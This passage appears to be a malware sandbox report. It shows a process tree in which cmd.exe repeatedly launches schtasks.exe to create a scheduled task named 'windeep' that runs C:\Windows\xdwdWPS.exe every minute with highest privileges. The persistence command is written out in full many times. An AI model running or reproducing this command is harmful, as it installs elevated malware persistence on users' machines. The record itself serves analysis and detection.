- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3204
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3696
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:812
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:784
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2604
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3976
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3876
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1176
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1220
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4396
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2224
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1164
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3056
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3300
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2220
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4604
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4180
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4632
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:5000
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1440
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4300
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1384
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3180
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2176
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4776
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4084
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4068
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2280
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2164
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2028
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1104
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2380
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2532
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2352
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1000
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1300
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2632
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3192
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1068
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4764
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1776
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3556
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3848
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3752
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4616
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1056
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2668
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4964
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3976
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2628
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1644
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1044
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1528
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:408
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2992
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5008
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4396
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1608
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2208
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4000
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2024
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3144
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3148
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3300
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4900
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2812
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4948
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2100
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:664
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4576
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1200
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1384
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3224
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:5096
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:436
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3668
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3068
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1588
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:748
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3204
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:5000
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4548
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4372
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1232
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3032
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:856
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2412
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4404
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1844
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3796
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3740
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3812
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1300
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3472
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3412
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2608
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:876
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2256
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4728
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3972
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1204
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2340
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2876
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2040
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4860
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4356
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4720
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4760
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2884
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1004
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2092
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3128
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1988
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2548
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1248
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1088
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2284
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:404
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1000
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3648
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3500
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3940
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3644
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3580
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4272
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3280
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4668
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2972
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3208
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2868
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2100
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1556
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2768
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1636
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1980
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5060
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3776
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2864
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2828
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2808
- - C:\Windows\SYSTEM32\CMD.exe
